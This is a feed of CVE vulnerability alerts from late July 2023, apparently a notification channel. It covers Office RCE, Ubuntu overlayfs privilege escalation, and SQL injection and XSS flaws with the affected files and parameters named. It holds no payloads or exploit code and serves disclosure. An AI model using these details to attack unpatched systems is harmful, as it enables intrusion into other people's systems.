🚨 CVE-2023-36884Microsoft is investigating reports of a series of remote code execution vulnerabilities impacting Windows and Office products. Microsoft is aware of targeted attacks that attempt to exploit these vulnerabilities by using specially-crafted Microsoft Office documents.An attacker could create a specially crafted Microsoft Office document that enables them to perform remote code execution in the context of the victim. However, an attacker would have to convince the victim to open the malicious file.Upon completion of this investigation, Microsoft will take the appropriate action to help protect our customers. This might include providing a security update through our monthly release process or providing an out-of-cycle security update, depending on customer needs.Please see the Microsoft Threat Intelligence Blog https://aka.ms/Storm-0978 Entry for important information about steps you can take to protect your system from this vulnerability.This CVE will be updated with new information and links to security updates when they become available.🎖@cveNotify |
|
| 2023-07-26 11:58:17 |
🚨 CVE-2022-2502A vulnerability exists in the HCI IEC 60870-5-104 function included in certain versions of the RTU500 series product. The vulnerability can only be exploited, if the HCI 60870-5-104 is configured with support for IEC 62351-5 and the CMU contains the license feature ‘Advanced security’ which must be ordered separately. If these preconditions are fulfilled, an attacker could exploit the vulnerability by sending a specially crafted message to the RTU500, causing the targeted RTU500 CMU to reboot. The vulnerability is caused by a missing input data validation which eventually if exploited causes an internal buffer to overflow in the HCI IEC 60870-5-104 function.🎖@cveNotify |
|
| 2023-07-26 11:58:16 |
🚨 CVE-2022-4608A vulnerability exists in HCI IEC 60870-5-104 function included in certain versions of the RTU500 series product. The vulnerability can only be exploited, if the HCI 60870-5-104 is configured with support for IEC 62351-3. After session resumption interval is expired an RTU500 initiated update of session parameters causes an unexpected restart due to a stack overflow.🎖@cveNotify |
|
| 2023-07-26 11:58:15 |
🚨 CVE-2023-20891The VMware Tanzu Application Service for VMs and Isolation Segment contain an information disclosure vulnerability due to the logging of credentials in hex encoding in platform system audit logs. A malicious non-admin user who has access to the platform system audit logs can access hex encoded CF API admin credentials and can push new malicious versions of an application. In a default deployment non-admin users do not have access to the platform system audit logs.🎖@cveNotify |
|
| 2023-07-26 11:58:14 |
🚨 CVE-2023-3946A reflected cross-site scripting (XSS) vulnerability in ePO prior to 5.10 SP1 Update 1allows a remote unauthenticated attacker to potentially obtain access to an ePO administrator's session by convincing the authenticated ePO administrator to click on a carefully crafted link. This would lead to limited access to sensitive information and limited ability to alter some information in ePO.🎖@cveNotify |
|
| 2023-07-26 05:58:19 |
🚨 CVE-2023-2640On Ubuntu kernels carrying both c914c0e27eb0 and "UBUNTU: SAUCE: overlayfs: Skip permission checking for trusted.overlayfs.* xattrs", an unprivileged user may set privileged extended attributes on the mounted files, leading them to be set on the upper files without the appropriate security checks.🎖@cveNotify |
|
| 2023-07-26 05:58:18 |
🚨 CVE-2023-32629Local privilege escalation vulnerability in Ubuntu Kernels overlayfs ovl_copy_up_meta_inode_data skip permission checks when calling ovl_do_setxattr on Ubuntu kernels🎖@cveNotify |
|
| 2023-07-26 05:58:17 |
🚨 CVE-2023-3947The Video Conferencing with Zoom plugin for WordPress is vulnerable to Sensitive Information Exposure due to hardcoded encryption key on the 'vczapi_encrypt_decrypt' function in versions up to, and including, 4.2.1. This makes it possible for unauthenticated attackers to decrypt and view the meeting id and password.🎖@cveNotify |
|
| 2023-07-26 05:58:14 |
🚨 CVE-2022-31457RTX TRAP v1.0 allows attackers to perform a directory traversal via a crafted request sent to the endpoint /data/.🎖@cveNotify |
|
| 2023-07-26 05:58:13 |
🚨 CVE-2023-38501copyparty is file server software. Prior to version 1.8.7, the application contains a reflected cross-site scripting via URL-parameter `?k304=...` and `?setck=...`. The worst-case outcome of this is being able to move or delete existing files on the server, or upload new files, using the account of the person who clicks the malicious link. It is recommended to change the passwords of one's copyparty accounts, unless one have inspected one's logs and found no trace of attacks. Version 1.8.7 contains a patch for the issue.🎖@cveNotify |
|
| 2023-07-26 05:58:12 |
🚨 CVE-2023-3945A vulnerability was found in phpscriptpoint Lawyer 1.6. It has been classified as problematic. This affects an unknown part of the file search.php. The manipulation leads to cross site scripting. It is possible to initiate the attack remotely. The identifier VDB-235401 was assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.🎖@cveNotify |
|
| 2023-07-26 01:58:17 |
🚨 CVE-2022-41906OpenSearch Notifications is a notifications plugin for OpenSearch that enables other plugins to send notifications via Email, Slack, Amazon Chime, Custom web-hook etc channels. A potential SSRF issue in OpenSearch Notifications Plugin starting in 2.0.0 and prior to 2.2.1 could allow an existing privileged user to enumerate listening services or interact with configured resources via HTTP requests exceeding the Notification plugin's intended scope. OpenSearch 2.2.1+ contains the fix for this issue. There are currently no recommended workarounds. 🎖@cveNotify |
|
| 2023-07-26 01:58:13 |
🚨 CVE-2023-38496Apptainer is an open source container platform. Version 1.2.0-rc.2 introduced an ineffective privilege drop when requesting container network setup, therefore subsequent functions are called with root privileges, the attack surface is rather limited for users but an attacker could possibly craft a starter config to delete any directory on the host filesystems. A security fix has been included in Apptainer 1.2.1. There is no known workaround outside of upgrading to Apptainer 1.2.1.🎖@cveNotify |
|
| 2023-07-26 01:58:12 |
🚨 CVE-2023-38502TDengine is an open source, time-series database optimized for Internet of Things devices. Prior to version 3.0.7.1, TDengine DataBase crashes on UDF nested query. This issue affects TDengine Databases which let users connect and run arbitrary queries. Version 3.0.7.1 has a patch for this issue.🎖@cveNotify |
|
| 2023-07-26 01:58:11 |
🚨 CVE-2023-3945A vulnerability was found in phpscriptpoint Lawyer 1.6. It has been classified as problematic. This affects an unknown part of the file search.php. The manipulation leads to cross site scripting. It is possible to initiate the attack remotely. The identifier VDB-235401 was assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.🎖@cveNotify |
|
| 2023-07-25 23:58:30 |
🚨 CVE-2022-31458RTX TRAP v1.0 was discovered to be vulnerable to host header poisoning.🎖@cveNotify |
|
| 2023-07-25 23:58:29 |
🚨 CVE-2022-46898An issue was discovered in Vocera Report Server and Voice Server 5.x through 5.8. There is Path Traversal via the "restore SQL data" filename. The Vocera Report Console contains a websocket function that allows for the restoration of the database from a ZIP archive that expects a SQL import file. The filename provided is not properly sanitized and allows for the inclusion of a path-traversal payload that can be used to escape the intended Vocera restoration directory. An attacker could exploit this vulnerability to point to a crafted ZIP archive that contains SQL commands that could be executed against the database.🎖@cveNotify |
|
| 2023-07-25 23:58:28 |
🚨 CVE-2022-46899An issue was discovered in Vocera Report Server and Voice Server 5.x through 5.8. There is Arbitrary File Upload. The BaseController class, that each of the service controllers derives from, allows for the upload of arbitrary files. If the HTTP request is a multipart/form-data POST request, any parameters with a filename entry will have their content written to a file in the Vocera upload-staging directory with the specified filename in the parameter.🎖@cveNotify |
|
| 2023-07-25 23:58:26 |
🚨 CVE-2022-46900An issue was discovered in Vocera Report Server and Voice Server 5.x through 5.8. There is Path Traversal in the Task Exec filename. The Vocera Report Console contains various jobs that are executed on the server at specified intervals, e.g., backup, etc. An authenticated user has the ability to modify these entries and set the executable path and parameters.🎖@cveNotify |
|
| 2023-07-25 23:58:25 |
🚨 CVE-2022-46901An issue was discovered in Vocera Report Server and Voice Server 5.x through 5.8. There is an Access Control Violation for Database Operations. The Vocera Report Console contains a websocket interface that allows for the unauthenticated execution of various tasks and database functions. This includes system tasks, and backing up, loading, and clearing of the database.🎖@cveNotify |
|
| 2023-07-25 23:58:24 |
🚨 CVE-2022-46902An issue was discovered in Vocera Report Server and Voice Server 5.x through 5.8. There is a Path Traversal for an Unzip operation. The Vocera Report Console contains a websocket function that allows for the restoration of the database from a ZIP archive that expects a SQL import file. During the unzip operation, the code takes file paths from the ZIP archive and writes them to a Vocera temporary directory. Unfortunately, the code does not properly check if the file paths include directory traversal payloads that would escape the intended destination.🎖@cveNotify |
|
| 2023-07-25 23:58:22 |
🚨 CVE-2023-34798An arbitrary file upload vulnerability in eoffice before v9.5 allows attackers to execute arbitrary code via uploading a crafted file.🎖@cveNotify |
|
| 2023-07-25 23:58:21 |
🚨 CVE-2023-37257DataEase is an open source data visualization analysis tool. Prior to version 1.18.9, the DataEase panel and dataset have a stored cross-site scripting vulnerability. The vulnerability has been fixed in v1.18.9. There are no known workarounds.🎖@cveNotify |
|
| 2023-07-25 23:58:17 |
🚨 CVE-2023-37258DataEase is an open source data visualization analysis tool. Prior to version 1.18.9, DataEase has a SQL injection vulnerability that can bypass blacklists. The vulnerability has been fixed in v1.18.9. There are no known workarounds.🎖@cveNotify |
|
| 2023-07-25 23:58:16 |
🚨 CVE-2023-37460Plexis Archiver is a collection of Plexus components to create archives or extract archives to a directory with a unified `Archiver`/`UnArchiver` API. Prior to version 4.8.0, using AbstractUnArchiver for extracting an archive might lead to an arbitrary file creation and possibly remote code execution. When extracting an archive with an entry that already exists in the destination directory as a symbolic link whose target does not exist - the `resolveFile()` function will return the symlink's source instead of its target, which will pass the verification that ensures the file will not be extracted outside of the destination directory. Later `Files.newOutputStream()`, that follows symlinks by default, will actually write the entry's content to the symlink's target. Whoever uses plexus archiver to extract an untrusted archive is vulnerable to an arbitrary file creation and possibly remote code execution. Version 4.8.0 contains a patch for this issue.🎖@cveNotify |
|
| 2023-07-25 23:58:15 |
🚨 CVE-2023-37677Pligg CMS v2.0.2 (also known as Kliqqi) was discovered to contain a remote code execution (RCE) vulnerability in the component admin_editor.php.🎖@cveNotify |
|
| 2023-07-25 23:58:14 |
🚨 CVE-2023-3944A vulnerability was found in phpscriptpoint Lawyer 1.6 and classified as problematic. Affected by this issue is some unknown functionality of the file page.php. The manipulation leads to cross site scripting. The attack may be launched remotely. The identifier of this vulnerability is VDB-235400. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.🎖@cveNotify |
|
| 2023-07-25 23:58:13 |
🚨 CVE-2023-38403iperf3 before 3.14 allows peers to cause an integer overflow and heap corruption via a crafted length field.🎖@cveNotify |
|
| 2023-07-25 20:58:33 |
🚨 CVE-2023-21950Vulnerability in the MySQL Server product of Oracle MySQL (component: Server: Replication). Supported versions that are affected are 8.0.27 and prior. Easily exploitable vulnerability allows high privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.1 Base Score 4.9 (Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H).🎖@cveNotify |
|
| 2023-07-25 20:58:32 |
🚨 CVE-2023-22005Vulnerability in the MySQL Server product of Oracle MySQL (component: Server: Replication). Supported versions that are affected are 8.0.33 and prior. Difficult to exploit vulnerability allows high privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.1 Base Score 4.4 (Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:U/C:N/I:N/A:H).🎖@cveNotify |
|
| 2023-07-25 20:58:31 |
🚨 CVE-2023-22033Vulnerability in the MySQL Server product of Oracle MySQL (component: InnoDB). Supported versions that are affected are 8.0.33 and prior. Difficult to exploit vulnerability allows high privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.1 Base Score 4.4 (Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:U/C:N/I:N/A:H).🎖@cveNotify |
|
| 2023-07-25 20:58:27 |
🚨 CVE-2023-35942Envoy is an open source edge and service proxy designed for cloud-native applications. Prior to versions 1.27.0, 1.26.4, 1.25.9, 1.24.10, and 1.23.12, gRPC access loggers using listener's global scope can cause a `use-after-free` crash when the listener is drained. Versions 1.27.0, 1.26.4, 1.25.9, 1.24.10, and 1.23.12 have a fix for this issue. As a workaround, disable gRPC access log or stop listener update.🎖@cveNotify |
|
| 2023-07-25 20:58:26 |
🚨 CVE-2023-35943Envoy is an open source edge and service proxy designed for cloud-native applications. Prior to versions 1.27.0, 1.26.4, 1.25.9, 1.24.10, and 1.23.12, the CORS filter will segfault and crash Envoy when the `origin` header is removed and deleted between `decodeHeaders`and `encodeHeaders`. Versions 1.27.0, 1.26.4, 1.25.9, 1.24.10, and 1.23.12 have a fix for this issue. As a workaround, do not remove the `origin` header in the Envoy configuration.🎖@cveNotify |
|
| 2023-07-25 20:58:25 |
🚨 CVE-2023-35980There are buffer overflow vulnerabilities in multiple underlying services that could lead to unauthenticated remote code execution by sending specially crafted packets destined to the PAPI (Aruba's access point management protocol) UDP port (8211). Successful exploitation of these vulnerabilities result in the ability to execute arbitrary code as a privileged user on the underlying operating system.🎖@cveNotify |
|
| 2023-07-25 20:58:21 |
🚨 CVE-2023-35982There are buffer overflow vulnerabilities in multiple underlying services that could lead to unauthenticated remote code execution by sending specially crafted packets destined to the PAPI (Aruba's access point management protocol) UDP port (8211). Successful exploitation of these vulnerabilities result in the ability to execute arbitrary code as a privileged user on the underlying operating system.🎖@cveNotify |
|
| 2023-07-25 20:58:20 |
🚨 CVE-2023-36826Sentry is an error tracking and performance monitoring platform. Starting in version 8.21.0 and prior to version 23.5.2, an authenticated user can download a debug or artifact bundle from arbitrary organizations and projects with a known bundle ID. The user does not need to be a member of the organization or have permissions on the project. A patch was issued in version 23.5.2 to ensure authorization checks are properly scoped on requests to retrieve debug or artifact bundles. Authenticated users who do not have the necessary permissions on the particular project are no longer able to download them. Sentry SaaS users do not need to take any action. Self-Hosted Sentry users should upgrade to version 23.5.2 or higher.🎖@cveNotify |
|
| 2023-07-25 20:58:19 |
🚨 CVE-2023-39128GNU gdb (GDB) 13.0.50.20220805-git was discovered to contain a stack overflow via the function ada_decode at /gdb/ada-lang.c.🎖@cveNotify |
|
| 2023-07-25 20:58:15 |
🚨 CVE-2023-39130GNU gdb (GDB) 13.0.50.20220805-git was discovered to contain a heap buffer overflow via the function pe_as16() at /gdb/coff-pe-read.c.🎖@cveNotify |
|
| 2023-07-25 20:58:14 |
🚨 CVE-2023-3684A vulnerability was found in LivelyWorks Articart 2.0.1 and classified as problematic. Affected by this issue is some unknown functionality of the file /change-language/de_DE of the component Base64 Encoding Handler. The manipulation of the argument redirectTo leads to open redirect. The attack may be launched remotely. VDB-234230 is the identifier assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.🎖@cveNotify |
|
| 2023-07-25 20:58:13 |
🚨 CVE-2023-3683A vulnerability has been found in LivelyWorks Articart 2.0.1 and classified as problematic. Affected by this vulnerability is an unknown functionality of the file /items/search. The manipulation of the argument search_term leads to cross site scripting. The attack can be launched remotely. The identifier VDB-234229 was assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.🎖@cveNotify |
|
| 2023-07-25 18:58:18 |
🚨 CVE-2023-3486An authentication bypass exists in PaperCut NG versions 22.0.12 and prior that could allow a remote, unauthenticated attacker to upload arbitrary files to the PaperCut NG host’s file storage. This could exhaust system resources and prevent the service from operating as expected.🎖@cveNotify |
|
| 2023-07-25 18:58:17 |
🚨 CVE-2023-1893The Login Configurator WordPress plugin through 2.1 does not properly escape a URL parameter before outputting it to the page, leading to a reflected cross-site scripting vulnerability targeting site administrators.🎖@cveNotify |
|
| 2023-07-25 18:58:16 |
🚨 CVE-2023-2029The PrePost SEO WordPress plugin through 3.0 does not properly sanitize some of its settings, which could allow high-privilege users to perform Stored Cross-Site Scripting (XSS) attacks even when the unfiltered_html capability is disallowed (for example in multisite setup)🎖@cveNotify |
|
| 2023-07-25 18:58:13 |
🚨 CVE-2023-2068The File Manager Advanced Shortcode WordPress plugin through 2.3.2 does not adequately prevent uploading files with disallowed MIME types when using the shortcode. This leads to RCE in cases where the allowed MIME type list does not include PHP files. In the worst case, this is available to unauthenticated users.🎖@cveNotify |
|
| 2023-07-25 18:58:12 |
🚨 CVE-2023-2224The SEO by 10Web WordPress plugin before 1.2.7 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup).🎖@cveNotify |
|
| 2023-07-25 18:58:11 |
🚨 CVE-2023-2223The Login rebuilder WordPress plugin before 2.8.1 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup).🎖@cveNotify |
|
| 2023-07-25 16:58:30 |
🚨 CVE-2023-22058Vulnerability in the MySQL Server product of Oracle MySQL (component: Server: DDL). Supported versions that are affected are 8.0.33 and prior. Difficult to exploit vulnerability allows high privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.1 Base Score 4.4 (Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:U/C:N/I:N/A:H).🎖@cveNotify |
|
| 2023-07-25 16:58:29 |
🚨 CVE-2023-22005Vulnerability in the MySQL Server product of Oracle MySQL (component: Server: Replication). Supported versions that are affected are 8.0.33 and prior. Difficult to exploit vulnerability allows high privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.1 Base Score 4.4 (Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:U/C:N/I:N/A:H).🎖@cveNotify |
|
| 2023-07-25 16:58:28 |
🚨 CVE-2023-22038Vulnerability in the MySQL Server product of Oracle MySQL (component: Server: Security: Privileges). Supported versions that are affected are 8.0.33 and prior. Easily exploitable vulnerability allows high privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of MySQL Server accessible data. CVSS 3.1 Base Score 2.7 (Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:L/A:N).🎖@cveNotify |
|
| 2023-07-25 16:58:24 |
🚨 CVE-2023-22033Vulnerability in the MySQL Server product of Oracle MySQL (component: InnoDB). Supported versions that are affected are 8.0.33 and prior. Difficult to exploit vulnerability allows high privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.1 Base Score 4.4 (Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:U/C:N/I:N/A:H).🎖@cveNotify |
|
| 2023-07-25 16:58:23 |
🚨 CVE-2023-22043Vulnerability in Oracle Java SE (component: JavaFX). The supported version that is affected is Oracle Java SE: 8u371. Difficult to exploit vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Oracle Java SE. Successful attacks of this vulnerability can result in unauthorized creation, deletion or modification access to critical data or all Oracle Java SE accessible data. Note: This vulnerability applies to Java deployments, typically in clients running sandboxed Java Web Start applications or sandboxed Java applets, that load and run untrusted code (e.g., code that comes from the internet) and rely on the Java sandbox for security. This vulnerability does not apply to Java deployments, typically in servers, that load and run only trusted code (e.g., code installed by an administrator). CVSS 3.1 Base Score 5.9 (Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:H/A:N).🎖@cveNotify |
|
| 2023-07-25 16:58:22 |
🚨 CVE-2023-22046Vulnerability in the MySQL Server product of Oracle MySQL (component: Server: Optimizer). Supported versions that are affected are 8.0.33 and prior. Easily exploitable vulnerability allows high privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.1 Base Score 4.9 (Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H).🎖@cveNotify |
|
| 2023-07-25 16:58:19 |
🚨 CVE-2023-22036Vulnerability in the Oracle Java SE, Oracle GraalVM Enterprise Edition, Oracle GraalVM for JDK product of Oracle Java SE (component: Utility). Supported versions that are affected are Oracle Java SE: 11.0.19, 17.0.7, 20.0.1; Oracle GraalVM Enterprise Edition: 20.3.10, 21.3.6, 22.3.2; Oracle GraalVM for JDK: 17.0.7 and 20.0.1. Difficult to exploit vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Oracle Java SE, Oracle GraalVM Enterprise Edition, Oracle GraalVM for JDK. Successful attacks of this vulnerability can result in unauthorized ability to cause a partial denial of service (partial DOS) of Oracle Java SE, Oracle GraalVM Enterprise Edition, Oracle GraalVM for JDK. Note: This vulnerability can be exploited by using APIs in the specified Component, e.g., through a web service which supplies data to the APIs. This vulnerability also applies to Java deployments, typically in clients running sandboxed Java Web Start applications or sandboxed Java applets, that load and run untrusted code (e.g., code that comes from the internet) and rely on the Java sandbox for security. CVSS 3.1 Base Score 3.7 (Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:L).🎖@cveNotify |
|
| 2023-07-25 16:58:18 |
🚨 CVE-2023-22049Vulnerability in the Oracle Java SE, Oracle GraalVM Enterprise Edition, Oracle GraalVM for JDK product of Oracle Java SE (component: Libraries). Supported versions that are affected are Oracle Java SE: 8u371, 8u371-perf, 11.0.19, 17.0.7, 20.0.1; Oracle GraalVM Enterprise Edition: 20.3.10, 21.3.6, 22.3.2; Oracle GraalVM for JDK: 17.0.7 and 20.0.1. Difficult to exploit vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Oracle Java SE, Oracle GraalVM Enterprise Edition, Oracle GraalVM for JDK. Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of Oracle Java SE, Oracle GraalVM Enterprise Edition, Oracle GraalVM for JDK accessible data. Note: This vulnerability can be exploited by using APIs in the specified Component, e.g., through a web service which supplies data to the APIs. This vulnerability also applies to Java deployments, typically in clients running sandboxed Java Web Start applications or sandboxed Java applets, that load and run untrusted code (e.g., code that comes from the internet) and rely on the Java sandbox for security. CVSS 3.1 Base Score 3.7 (Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:L/A:N).🎖@cveNotify |
|
| 2023-07-25 16:58:17 |
🚨 CVE-2023-22044Vulnerability in the Oracle Java SE, Oracle GraalVM Enterprise Edition, Oracle GraalVM for JDK product of Oracle Java SE (component: Hotspot). Supported versions that are affected are Oracle Java SE: 8u371-perf, 17.0.7, 20.0.1; Oracle GraalVM Enterprise Edition: 21.3.6, 22.3.2; Oracle GraalVM for JDK: 17.0.7 and 20.0.1. Difficult to exploit vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Oracle Java SE, Oracle GraalVM Enterprise Edition, Oracle GraalVM for JDK. Successful attacks of this vulnerability can result in unauthorized read access to a subset of Oracle Java SE, Oracle GraalVM Enterprise Edition, Oracle GraalVM for JDK accessible data. Note: This vulnerability can be exploited by using APIs in the specified Component, e.g., through a web service which supplies data to the APIs. This vulnerability also applies to Java deployments, typically in clients running sandboxed Java Web Start applications or sandboxed Java applets, that load and run untrusted code (e.g., code that comes from the internet) and rely on the Java sandbox for security. CVSS 3.1 Base Score 3.7 (Confidentiality impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N).🎖@cveNotify |
|
| 2023-07-25 16:58:13 |
🚨 CVE-2023-22054Vulnerability in the MySQL Server product of Oracle MySQL (component: Server: Optimizer). Supported versions that are affected are 8.0.33 and prior. Easily exploitable vulnerability allows high privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.1 Base Score 4.9 (Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H).🎖@cveNotify |
|
| 2023-07-25 16:58:12 |
🚨 CVE-2023-2975Issue summary: The AES-SIV cipher implementation contains a bug that causesit to ignore empty associated data entries which are unauthenticated asa consequence.Impact summary: Applications that use the AES-SIV algorithm and want toauthenticate empty data entries as associated data can be mislead by removingadding or reordering such empty entries as these are ignored by the OpenSSLimplementation. We are currently unaware of any such applications.The AES-SIV algorithm allows for authentication of multiple associateddata entries along with the encryption. To authenticate empty data theapplication has to call EVP_EncryptUpdate() (or EVP_CipherUpdate()) withNULL pointer as the output buffer and 0 as the input buffer length.The AES-SIV implementation in OpenSSL just returns success for such a callinstead of performing the associated data authentication operation.The empty data thus will not be authenticated.As this issue does not affect non-empty associated data authentication andwe expect it to be rare for an application to use empty associated dataentries this is qualified as Low severity issue.🎖@cveNotify |
|
| 2023-07-25 16:58:11 |
🚨 CVE-2023-21400In multiple functions of io_uring.c, there is a possible kernel memory corruption due to improper locking. This could lead to local escalation of privilege in the kernel with System execution privileges needed. User interaction is not needed for exploitation.🎖@cveNotify |
|
| 2023-07-25 14:58:36 |
🚨 CVE-2023-33777An issue in /functions/fbaorder.php of Prestashop amazon before v5.2.24 allows attackers to execute a directory traversal attack.🎖@cveNotify |
|
| 2023-07-25 14:58:35 |
🚨 CVE-2023-37361REDCap 12.0.26 LTS and 12.3.2 Standard allows SQL Injection via scheduling, repeatforms, purpose, app_title, or randomization.🎖@cveNotify |
|
| 2023-07-25 14:58:34 |
🚨 CVE-2023-3874A vulnerability, which was classified as critical, was found in Campcodes Beauty Salon Management System 1.0. Affected is an unknown function of the file /admin/admin-profile.php. The manipulation of the argument adminname leads to sql injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-235236.🎖@cveNotify |
|
| 2023-07-25 14:58:33 |
🚨 CVE-2023-23568Improper privilege validation in Command Centre Server allows authenticated unprivileged operators to modify and view Personal Data Fields.This issue affects Command Centre: vEL8.90 prior to vEL8.90.1318 (MR1), vEL8.80 prior to vEL8.80.1192 (MR2), vEL8.70 prior to vEL8.70.2185 (MR4), vEL8.60 prior to vEL8.60.2347 (MR6), vEL8.50 prior to vEL8.50.2831 (MR8), all versions vEL8.40 and prior🎖@cveNotify |
|
| 2023-07-25 14:58:32 |
🚨 CVE-2023-3875A vulnerability has been found in Campcodes Beauty Salon Management System 0.1.0 and classified as critical. Affected by this vulnerability is an unknown functionality of the file /admin/del_feedback.php. The manipulation of the argument id leads to sql injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-235237 was assigned to this vulnerability.🎖@cveNotify |
|
| 2023-07-25 14:58:28 |
🚨 CVE-2023-3876A vulnerability was found in Campcodes Beauty Salon Management System 1.0 and classified as critical. Affected by this issue is some unknown functionality of the file /admin/search-appointment.php. The manipulation of the argument searchdata leads to sql injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. VDB-235238 is the identifier assigned to this vulnerability.🎖@cveNotify |
|
| 2023-07-25 14:58:27 |
🚨 CVE-2023-3877A vulnerability was found in Campcodes Beauty Salon Management System 1.0. It has been classified as critical. This affects an unknown part of the file /admin/add-services.php. The manipulation of the argument cost leads to sql injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-235239.🎖@cveNotify |
|
| 2023-07-25 14:58:26 |
🚨 CVE-2023-3878A vulnerability was found in Campcodes Beauty Salon Management System 1.0. It has been declared as critical. This vulnerability affects unknown code of the file /admin/about-us.php. The manipulation of the argument pagedes leads to sql injection. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-235240.🎖@cveNotify |
|
| 2023-07-25 14:58:25 |
🚨 CVE-2023-32639Applicant Programme Ver.7.06 and earlier improperly restricts XML external entity references (XXE). By processing a specially crafted XML file, arbitrary files on the system may be read by an attacker.🎖@cveNotify |
|
| 2023-07-25 14:58:24 |
🚨 CVE-2023-38745Pandoc before 3.1.6 allows arbitrary file write: this can be triggered by providing a crafted image element in the input when generating files via the --extract-media option or outputting to PDF format. This allows an attacker to create or overwrite arbitrary files, depending on the privileges of the process running Pandoc. It only affects systems that pass untrusted user input to Pandoc and allow Pandoc to be used to produce a PDF or with the --extract-media option. NOTE: this issue exists because of an incomplete fix for CVE-2023-35936 (failure to properly account for double encoded path names).🎖@cveNotify |
|
| 2023-07-25 14:58:21 |
🚨 CVE-2023-3879A vulnerability was found in Campcodes Beauty Salon Management System 1.0. It has been rated as critical. This issue affects some unknown processing of the file /admin/del_category.php. The manipulation of the argument id leads to sql injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-235241 was assigned to this vulnerability.🎖@cveNotify |
|
| 2023-07-25 14:58:20 |
🚨 CVE-2023-3880A vulnerability classified as critical has been found in Campcodes Beauty Salon Management System 1.0. Affected is an unknown function of the file /admin/del_service.php. The manipulation of the argument editid leads to sql injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. VDB-235242 is the identifier assigned to this vulnerability.🎖@cveNotify |
|
| 2023-07-25 14:58:19 |
🚨 CVE-2023-3873A vulnerability, which was classified as critical, has been found in Campcodes Beauty Salon Management System 1.0. This issue affects some unknown processing of the file /admin/index.php. The manipulation of the argument username leads to sql injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-235235.🎖@cveNotify |
|
| 2023-07-25 14:58:18 |
🚨 CVE-2023-26045NodeBB is Node.js based forum software. Starting in version 2.5.0 and prior to version 2.8.7, due to the use of the object destructuring assignment syntax in the user export code path, combined with a path traversal vulnerability, a specially crafted payload could invoke the user export logic to arbitrarily execute javascript files on the local disk. This issue is patched in version 2.8.7. As a workaround, site maintainers can cherry pick the fix into their codebase to patch the exploit.🎖@cveNotify |
|
| 2023-07-25 14:58:14 |
